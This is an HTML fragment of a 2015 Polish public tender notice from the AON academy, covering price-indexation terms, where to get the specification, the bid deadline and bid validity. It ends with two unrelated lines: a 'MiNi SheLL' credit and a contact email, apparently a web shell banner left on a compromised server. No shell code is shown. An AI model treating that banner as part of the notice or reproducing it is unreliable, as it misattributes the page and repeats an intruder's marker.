<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza indeksację wynagrodzenia należnego Wykonawcy w przypadku wystąpienia nadzwyczajnych okoliczności tj. wysoka inflacja, poważne zakłócenia na rynku zaopatrzeniowym, załamanie wzrostu gospodarczego, klęska żywiołowa itd. lub jeżeli wskaźnik wzrostu cen towarów dla poszczególnych grup produktów, opublikowany przez Główny Urząd Statystyczny w publikacji branżowej -Ceny, handel, usługi - wskaźnik zmiany cen żywności i napojów bezalkoholowych o tytule -Ceny w gospodarce narodowej- miesięczne, ulegnie zmianie o 5 % w stosunku do cen obowiązujących w umowie. Zapis dla Wykonawców, którzy niezaoferują gwarancji niezmienności cen. 2. Zamawiający nie dopuszcza indeksacji wynagrodzenia należnego Wykonawcy w okresie obowiązywania umowy od. do. W przypadku zaoferowania przez Wykonawcę gwarancji niezmienności cen w trakcie obowiązywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aon.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres jak na wstępie, budynek nr 4 pokój nr 129. Koszt siwz - 8,80 zł. i koszty przesyłki. Siwz pobrana ze strony internetowej Zamawiającego jest bezpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2015 godzina 09:30, miejsce: Oferty należy składać w siedzibie Zamawiającego, adres jak na wstępie w Kancelarii Jawnej AON - budynek nr 101 - pokój nr 210a (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com